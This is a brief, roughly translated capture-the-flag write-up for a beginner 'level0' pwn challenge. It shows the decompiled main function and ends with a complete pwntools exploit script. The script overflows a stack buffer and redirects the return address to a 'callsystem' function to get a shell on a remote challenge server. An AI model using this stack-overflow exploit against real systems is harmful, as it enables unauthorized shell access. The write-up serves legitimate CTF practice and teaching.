PWN beginner level0

First, look at the file format properties .

Run it and have a look .

Throw in IDA in , Look at the code .

int __cdecl main(int argc, const char **argv, const char **envp)
{
    
  write(1, "Hello, World\n", 0xDuLL);
  return vulnerable_function();
}

Take a look at the function .

At the same time, we also found the functions that enter the server .


We just need to put read Function ret Change it to callsystem The address of , You can access the server .
Write source code ：

from pwn import *
context(os='Linux',arch="amd64",log_level="debug")
content = 0 

elf = ELF("Level0")
system_addr = elf.symbols["callsystem"] # 0x400596

def main():
	if content == 1:
		day3 = process("Level0")
	else:
		day3 =remote("111.200.241.244",58272)
	payload = b'a' * (0x80 + 8) + p64(system_addr)
	
	day3.recvuntil("Hello, World\n")
	day3.sendline(payload)
	
	day3.interactive()

main()